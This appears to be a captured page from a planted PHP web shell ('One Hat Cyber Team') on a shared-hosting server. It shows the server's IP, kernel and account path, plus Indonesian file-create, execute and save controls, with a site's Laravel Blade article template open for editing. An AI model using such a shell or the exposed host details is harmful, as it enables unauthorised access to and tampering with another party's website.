⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.60
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
smarbgfw
/
.trash
/
core
/
resources
/
views
/
front
/
Edit File: article_details.blade.php
@extends("front.$version.layout") @section('pagename') - {{__('Knowledgebase')}} - {{ convertUtf8($details->title) }} @endsection @section('meta-keywords', "$details->meta_keywords") @section('meta-description', "$details->meta_description") @section('breadcrumb-title', convertUtf8($bex->knowledgebase_details_title)) @section('breadcrumb-subtitle', strlen($details->title) > 30 ? mb_substr($details->title,0,30,'utf-8') . '...' : $details->title) @section('breadcrumb-link', __('Knowledgebase')) @section('content') {{-- article details strat --}}
@foreach ($article_categories as $article_category)
{{ $article_category->name }}
@php $articles = App\Article::where('article_category_id', $article_category->id) ->orderBy('id', 'desc') ->get(); @endphp @if (count($articles) == 0)
{{ '0 ' . __('Articles in this category') }}
@else
@foreach ($articles as $article)
{{ strlen($article->title) > 30 ? mb_substr($article->title, 0, 30, 'utf-8') . '...' : $article->title }}
@endforeach
@endif
@endforeach
{{ $details->title }}
{!! replaceBaseUrl($details->content) !!}
@php $date = Carbon\Carbon::parse($details->created_at); @endphp
{{ __('Created') . ' : ' . $date->translatedFormat('jS F, Y') }}
{{ __('Share') }}:
{{-- article details end --}} @endsection
Simpan